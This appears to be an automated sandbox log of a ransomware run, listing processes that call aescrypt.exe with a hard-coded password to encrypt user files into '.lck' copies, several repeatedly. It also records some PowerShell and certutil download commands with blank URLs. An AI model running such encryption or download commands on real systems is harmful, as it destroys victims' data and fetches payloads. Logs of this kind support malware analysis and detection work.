C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck.lck" "Are.docx.lck.lck"
3⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck.lck" "Recently.docx.lck.lck"
3⤵
PID:5040

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck.lck" "Opened.docx.lck.lck"
3⤵
PID:5056

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck.lck" "Files.docx.lck.lck"
3⤵
PID:5068

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck.lck.lck" "These.docx.lck.lck.lck"
3⤵
PID:5084

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck.lck.lck" "Are.docx.lck.lck.lck"
3⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck.lck.lck" "Recently.docx.lck.lck.lck"
3⤵
PID:5116

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck.lck.lck" "Files.docx.lck.lck.lck"
3⤵
PID:1448

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck.lck.lck" "Opened.docx.lck.lck.lck"
3⤵
PID:4112

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck" "LimitBackup.mpp"
3⤵
PID:4128

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck" "LimitBackup.mpp.lck"
3⤵
PID:4156

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck.lck" "LimitBackup.mpp.lck.lck"
3⤵
PID:4180

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck.lck.lck" "LimitBackup.mpp.lck.lck.lck"
3⤵
PID:4192

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck" "TraceSave.xlsm"
3⤵
PID:4220

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck" "TraceSave.xlsm.lck"
3⤵
PID:4244

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck.lck" "TraceSave.xlsm.lck.lck"
3⤵
PID:4256

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck.lck.lck" "TraceSave.xlsm.lck.lck.lck"
3⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck" "TestOptimize.ppsx"
3⤵
PID:4308

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck" "TestOptimize.ppsx.lck"
3⤵
PID:4320

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck.lck" "TestOptimize.ppsx.lck.lck"
3⤵
PID:4348

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck.lck.lck" "TestOptimize.ppsx.lck.lck.lck"
3⤵
PID:4372

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck" "NewMeasure.vstx"
3⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck" "NewMeasure.vstx.lck"
3⤵
PID:4412

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck.lck" "NewMeasure.vstx.lck.lck"
3⤵
PID:4436

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck.lck.lck" "NewMeasure.vstx.lck.lck.lck"
3⤵
PID:4448

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck" "AssertDebug.xlsm"
3⤵
PID:4476

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck" "AssertDebug.xlsm.lck"
3⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck.lck" "AssertDebug.xlsm.lck.lck"
3⤵
PID:4512

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck.lck.lck" "AssertDebug.xlsm.lck.lck.lck"
3⤵
PID:4540

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck" "ExpandConfirm.dotx"
3⤵
PID:4564

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck" "ExpandConfirm.dotx.lck"
3⤵
PID:4576

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck.lck" "ExpandConfirm.dotx.lck.lck"
3⤵
PID:4604

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck.lck.lck" "ExpandConfirm.dotx.lck.lck.lck"
3⤵
PID:4624

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck" "StartProtect.wps"
3⤵
PID:4640

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck" "StartProtect.wps.lck"
3⤵
PID:4668

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck.lck" "StartProtect.wps.lck.lck"
3⤵
PID:4692

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck.lck.lck" "StartProtect.wps.lck.lck.lck"
3⤵
PID:4704

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck" "RenameCompare.mpp"
3⤵
PID:4720

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck" "RenameCompare.mpp.lck"
3⤵
PID:4748

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck.lck" "RenameCompare.mpp.lck.lck"
3⤵
PID:4772

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck.lck.lck" "RenameCompare.mpp.lck.lck.lck"
3⤵
PID:4784

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck" "StartInitialize.pub"
3⤵
PID:4812

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck" "StartInitialize.pub.lck"
3⤵
PID:4828

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck.lck" "StartInitialize.pub.lck.lck"
3⤵
PID:4852

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck.lck.lck" "StartInitialize.pub.lck.lck.lck"
3⤵
PID:4876

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck" "DenyBackup.vstm"
3⤵
PID:4900

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck" "DenyBackup.vstm.lck"
3⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck.lck" "DenyBackup.vstm.lck.lck"
3⤵
PID:4944

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck.lck.lck" "DenyBackup.vstm.lck.lck.lck"
3⤵
PID:4972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:4316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:4404

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "WriteAdd.pptx.lck" "WriteAdd.pptx"
3⤵
PID:4416

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SelectReset.ADT.lck" "SelectReset.ADT"
3⤵
PID:4460

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InitializeRestart.rar.lck" "InitializeRestart.rar"
3⤵
PID:4484

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SaveSkip.mp2.lck" "SaveSkip.mp2"
3⤵
PID:4496

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GrantConvert.wvx.lck" "GrantConvert.wvx"
3⤵
PID:4524

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertGrant.M2TS.lck" "AssertGrant.M2TS"
3⤵
PID:4548

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertUnprotect.emf.lck" "AssertUnprotect.emf"
3⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "UnpublishUnregister.wps.lck" "UnpublishUnregister.wps"
3⤵
PID:4592

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RegisterSend.mpeg.lck" "RegisterSend.mpeg"
3⤵
PID:4620

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "JoinEnable.edrwx.lck" "JoinEnable.edrwx"
3⤵
PID:4656

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResetGet.edrwx.lck" "ResetGet.edrwx"
3⤵
PID:4672

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SaveRequest.asx.lck" "SaveRequest.asx"
3⤵
PID:4764

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BlockSend.ps1.lck" "BlockSend.ps1"
3⤵
PID:4800

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncComplete.txt.lck" "SyncComplete.txt"
3⤵
PID:4816

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartResume.kix.lck" "StartResume.kix"
3⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "UseMeasure.edrwx.lck" "UseMeasure.edrwx"
3⤵
PID:4864

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ConvertFromGroup.tif.lck" "ConvertFromGroup.tif"
3⤵
PID:4888

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RegisterStart.mpg.lck" "RegisterStart.mpg"
3⤵
PID:4964

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "WaitRead.xml.lck" "WaitRead.xml"
3⤵
PID:2888

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MeasureInitialize.mid.lck" "MeasureInitialize.mid"
3⤵
PID:4980

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StopEdit.otf.lck" "StopEdit.otf"
3⤵
PID:184

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishUndo.vb.lck" "PublishUndo.vb"
3⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeJoin.ADTS.lck" "ResizeJoin.ADTS"
3⤵
PID:5096

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StepGet.avi.lck" "StepGet.avi"
3⤵
PID:5032

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InvokePop.ppsx.lck" "InvokePop.ppsx"
3⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DisableRestart.vbe.lck" "DisableRestart.vbe"
3⤵
PID:5064

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CheckpointSkip.dwg.lck" "CheckpointSkip.dwg"
3⤵
PID:4260

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendUninstall.potx.lck" "SendUninstall.potx"
3⤵
PID:4212

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InitializeApprove.vbs.lck" "InitializeApprove.vbs"
3⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandEdit.vstm.lck" "ExpandEdit.vstm"
3⤵
PID:4420

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectRegister.php.lck" "ProtectRegister.php"
3⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "WriteWait.jpeg.lck" "WriteWait.jpeg"
3⤵
PID:4528

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectLimit.ppsm.lck" "ProtectLimit.ppsm"
3⤵
PID:4572

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CheckpointRepair.wm.lck" "CheckpointRepair.wm"
3⤵
PID:368

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestSearch.ico.lck" "TestSearch.ico"
3⤵
PID:4956

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ImportRename.cab.lck" "ImportRename.cab"
3⤵
PID:3060

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveRevoke.m3u.lck" "MoveRevoke.m3u"
3⤵
PID:3112

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CloseDisconnect.bmp.lck" "CloseDisconnect.bmp"
3⤵
PID:3212

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishUpdate.iso.lck" "PublishUpdate.iso"
3⤵
PID:3684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:4336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
PID:3456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
PID:3916

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:3600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:3460

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:4444

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck" "Wallpaper.jpg"
3⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck" "ResizeUndo.svgz"
3⤵
PID:3912

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck" "BackupImport.dxf"
3⤵
PID:3368

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
